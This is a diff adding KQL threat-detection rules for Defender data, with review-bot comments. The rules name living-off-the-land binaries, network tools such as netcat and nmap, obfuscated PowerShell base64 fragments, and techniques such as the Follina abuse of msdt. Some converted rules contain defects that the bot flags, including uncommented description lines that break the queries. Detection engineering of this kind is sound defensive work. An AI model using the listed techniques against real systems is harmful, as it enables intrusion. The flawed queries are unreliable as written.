diff --git a/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql b/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql
new file mode 100644
index 00000000..affa996f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious High IntegrityLevel Conhost Legacy Option
+// Author: frack113
+// Date: 2022-12-09
+// Level: informational
+// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - Very Likely, including launching cmd.exe via Run As Administrator
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "conhost.exe" and ProcessCommandLine contains "0xffffffff" and ProcessCommandLine contains "-ForceV1") and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql b/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
new file mode 100644
index 00000000..550eac24
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of appcmd to add new URL rewrite rules
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:system.webServer/rewrite/globalRules" and ProcessCommandLine contains "commit:") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql b/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql
new file mode 100644
index 00000000..3fa20937
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious JavaScript Execution Via Mshta.EXE
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects execution of javascript code using "mshta.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.005
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "javascript" and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql
new file mode 100644
index 00000000..bf8df16e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious LNK Double Extension File Created
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2022-11-07
+// Level: medium
+// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.007
+// False Positives:
+// - Some tuning is required for other general purpose directories of third party apps
+
+DeviceFileEvents
+| where ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and FolderPath endswith ".lnk") and (not(FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\")) and (not(((InitiatingProcessFolderPath endswith "\\excel.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Excel") or (InitiatingProcessFolderPath endswith "\\powerpnt.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\PowerPoint") or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Word"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql b/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql
new file mode 100644
index 00000000..c7d27d6a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql
@@ -0,0 +1,10 @@ +// Title: Suspicious Microsoft Office Child Process +// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io +// Date: 2018-04-06 +// Level: high +// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010 + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith 
"\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql b/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql new file mode 100644 index 00000000..3cd23e51 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql 
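Review bot: The third disjunct on the last line of this hunk (`FolderPath contains "\\AppData\\" or FolderPath contains "\\ProgramData\\" ...`) alerts on any child of an Office process whose image lives under a per-user or ProgramData path, which on a typical fleet includes per-user installed updaters, collaboration clients and add-in hosts, yet the header carries no False Positives block to record that tuning is expected. Suggest adding `// False Positives:` followed by `// - Per-user installed add-ins, updaters and helper applications under AppData/ProgramData launched by Office; tune per environment`. The `in~` list of OriginalFileName values and the `endswith` path list mix upper and lower case, which is harmless because both operators are case-insensitive, but normalising the case in the generator would make the lists easier to maintain. The hunk starts on the previous line.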
@@ -0,0 +1,10 @@
+// Title: Suspicious Msbuild Execution By Uncommon Parent Process
+// Author: frack113
+// Date: 2022-11-17
+// Level: medium
+// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\MSBuild.exe" or ProcessVersionInfoOriginalFileName =~ "MSBuild.exe") and (not((InitiatingProcessFolderPath endswith "\\devenv.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\python.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\nuget.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql b/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql
new file mode 100644
index 00000000..14601d2d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql
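Review bot: The parent exclusion list on the last line removes `cmd.exe` and `explorer.exe`, which are also the parents of an interactive or script-driven MSBuild launch, so the rule effectively observes only MSBuild started from service-like or otherwise unusual parents. That looks inherited from the upstream Sigma logic rather than a conversion error, but it is a coverage limit worth stating in the header so an analyst does not assume the rule covers shell-launched MSBuild: e.g. `// Note: cmd.exe and explorer.exe parents are excluded to limit developer noise; pair with a command-line based MSBuild rule to cover those parents.`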
@@ -0,0 +1,10 @@
+// Title: Suspicious MSDT Parent Process
+// Author: Nextron Systems
+// Date: 2022-06-01
+// Level: high
+// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1218
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql b/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql
new file mode 100644
index 00000000..15cd1ac7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious MSHTA Child Process
+// Author: Michael Haag
+// Date: 2019-01-16
+// Level: high
+// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003
+// False Positives:
+// - Printer software / driver installations
+// - HP software
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\bitsadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe", "cscript.exe", "Bash.exe", "reg.exe", "REGSVR32.EXE", "bitsadmin.exe"))) and InitiatingProcessFolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql
new file mode 100644
index 00000000..e645f938
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious MsiExec Embedding Parent
+// Author: frack113
+// Date: 2022-04-16
+// Level: medium
+// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218.007, attack.defense-evasion
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") and (InitiatingProcessCommandLine contains "MsiExec.exe" and InitiatingProcessCommandLine contains "-Embedding ")) and (not(((ProcessCommandLine contains "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" and FolderPath endswith ":\\Windows\\System32\\cmd.exe") or (ProcessCommandLine contains "\\DismFoDInstall.cmd" or (InitiatingProcessCommandLine contains "\\MsiExec.exe -Embedding " and InitiatingProcessCommandLine contains "Global\\MSI0000")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql
new file mode 100644
index 00000000..142dc056
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_msiexec_execute_arbitrary_dll.kql
@@ -0,0 +1,14 @@ +// Title: Suspicious Msiexec Execute Arbitrary DLL +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. +Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 +// False Positives: +// - Legitimate script + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -y" or ProcessCommandLine contains " /y" or ProcessCommandLine contains " –y" or ProcessCommandLine contains " —y" or ProcessCommandLine contains " ―y") and FolderPath endswith "\\msiexec.exe") and (not((ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" /Y C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y C:\\Windows\\CCM\\"))) \ No newline at end of file 
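Review bot: Line 6 of the new file (`+Msiexec.exe is the command-line utility for the Windows Installer ...`) is the continuation of a multi-line Sigma description emitted without the `//` prefix, so the .kql is not a valid query as written: the parser will read that sentence as a statement before it reaches `DeviceProcessEvents`. The converter should prefix every line of a multi-line description with `// ` (or join the lines into one comment) rather than only the first. The same defect appears in the keyboard-layout IME hunk (`+Before doing this, ...` and `+IMEs are essential ...`), the svchost masquerading hunk (`+Adversaries often disguise ...`) and the PROCEXP152.sys hunk (`+This driver is used ...`).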
diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql new file mode 100644 index 00000000..03997270 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_msiexec_quiet_install_from_remote_location.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Msiexec Quiet Install From Remote Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-28 +// Level: medium +// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "\\AppData\\Local\\Temp\\OpenOffice" and ProcessCommandLine contains "Installation Files\\openoffice"))) \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql b/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql
new file mode 100644
index 00000000..e0654e90
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_network_connection_binary_no_commandline.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Network Connection Binary No CommandLine
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-03
+// Level: high
+// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceNetworkEvents
+| where ((InitiatingProcessCommandLine endswith "\\regsvr32.exe" or InitiatingProcessCommandLine endswith "\\rundll32.exe" or InitiatingProcessCommandLine endswith "\\dllhost.exe") and (InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql b/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql
new file mode 100644
index 00000000..5e6427e8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_obfuscated_powershell_code.kql
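Review bot: `InitiatingProcessCommandLine endswith "\\regsvr32.exe"` on the last line only matches when the recorded command line is an unquoted full path with nothing after it; in Defender data the initiating command line is often stored as the bare image name or wrapped in quotes (`"C:\...\rundll32.exe"`), and both forms end in something other than `\rundll32.exe`, so the "no arguments" case this rule exists for is largely missed. Normalise before comparing, e.g. `| extend cl = trim(@'[\s"]+', InitiatingProcessCommandLine)` and then `(cl endswith "\\regsvr32.exe" or cl =~ "regsvr32.exe" or ...)`. The trailing `not((InitiatingProcessCommandLine =~ "" or isnull(...)))` clause is redundant once an `endswith` has matched and can be dropped.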
@@ -0,0 +1,10 @@ +// Title: Suspicious Obfuscated PowerShell Code +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-11 +// Level: high +// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "IAAtAGIAeABvAHIAIAAwAHgA" or ProcessCommandLine contains "AALQBiAHgAbwByACAAMAB4A" or ProcessCommandLine contains "gAC0AYgB4AG8AcgAgADAAeA" or ProcessCommandLine contains "AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg" or ProcessCommandLine contains "AuAEkAbgB2AG8AawBlACgAKQAgAHwAI" or ProcessCommandLine contains "ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AJwAgAC0AZgAg" \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql b/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql new file mode 100644 index 00000000..475dce6c --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_package_installed_linux.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Package Installed - Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-03 +// Level: medium +// Description: Detects installation of suspicious packages using system installation utilities +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "install" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--install" or ProcessCommandLine contains "-i") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains "-i" and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "localinstall" or ProcessCommandLine contains "install") and FolderPath endswith "/yum")) and (ProcessCommandLine contains "nmap" or ProcessCommandLine contains " nc" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "wireshark" or ProcessCommandLine contains "tshark" or ProcessCommandLine contains "openconnect" or ProcessCommandLine contains "proxychains") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql b/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql new file mode 100644 index 00000000..fd23deca --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_parent_double_extension_file_execution.kql 
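Review bot: `ProcessCommandLine contains " nc"` on the last line matches any package name that begins with "nc" (ncurses, ncdu, ncftp and similar), so routine apt/yum installs of common libraries will trip this medium-level rule. KQL has a term-based operator for this: `ProcessCommandLine has "nc"` matches "nc" only as a whole term, which is what the Sigma author presumably meant; the same applies to the `-i` token for rpm/dpkg, which `contains` also finds inside unrelated flags. Consider switching these two tokens to `has` and leaving the longer names (`nmap`, `netcat`, `wireshark`, ...) on `contains`.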
@@ -0,0 +1,10 @@ +// Title: Suspicious Parent Double Extension File Execution +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-06 +// Level: high +// Description: Detect execution of suspicious double extension files in ParentCommandLine +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.007 + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith ".doc.lnk" or InitiatingProcessFolderPath endswith ".docx.lnk" or InitiatingProcessFolderPath endswith ".xls.lnk" or InitiatingProcessFolderPath endswith ".xlsx.lnk" or InitiatingProcessFolderPath endswith ".ppt.lnk" or InitiatingProcessFolderPath endswith ".pptx.lnk" or InitiatingProcessFolderPath endswith ".rtf.lnk" or InitiatingProcessFolderPath endswith ".pdf.lnk" or InitiatingProcessFolderPath endswith ".txt.lnk" or InitiatingProcessFolderPath endswith ".doc.js" or InitiatingProcessFolderPath endswith ".docx.js" or InitiatingProcessFolderPath endswith ".xls.js" or InitiatingProcessFolderPath endswith ".xlsx.js" or InitiatingProcessFolderPath endswith ".ppt.js" or InitiatingProcessFolderPath endswith ".pptx.js" or InitiatingProcessFolderPath endswith ".rtf.js" or InitiatingProcessFolderPath endswith ".pdf.js" or InitiatingProcessFolderPath endswith ".txt.js") or (InitiatingProcessCommandLine contains ".doc.lnk" or InitiatingProcessCommandLine contains ".docx.lnk" or InitiatingProcessCommandLine contains ".xls.lnk" or InitiatingProcessCommandLine contains ".xlsx.lnk" or InitiatingProcessCommandLine contains ".ppt.lnk" or InitiatingProcessCommandLine contains ".pptx.lnk" or InitiatingProcessCommandLine contains ".rtf.lnk" or InitiatingProcessCommandLine contains ".pdf.lnk" or InitiatingProcessCommandLine contains ".txt.lnk" or InitiatingProcessCommandLine contains ".doc.js" or InitiatingProcessCommandLine contains ".docx.js" or InitiatingProcessCommandLine contains ".xls.js" or InitiatingProcessCommandLine contains ".xlsx.js" or 
InitiatingProcessCommandLine contains ".ppt.js" or InitiatingProcessCommandLine contains ".pptx.js" or InitiatingProcessCommandLine contains ".rtf.js" or InitiatingProcessCommandLine contains ".pdf.js" or InitiatingProcessCommandLine contains ".txt.js") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql new file mode 100644 index 00000000..c10a7be9 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql 
@@ -0,0 +1,13 @@
+// Title: Suspicious Path In Keyboard Layout IME File Registry Value
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-21
+// Level: high
+// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
+Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql b/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql
new file mode 100644
index 00000000..369e2266
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_ping_del_command_combination.kql
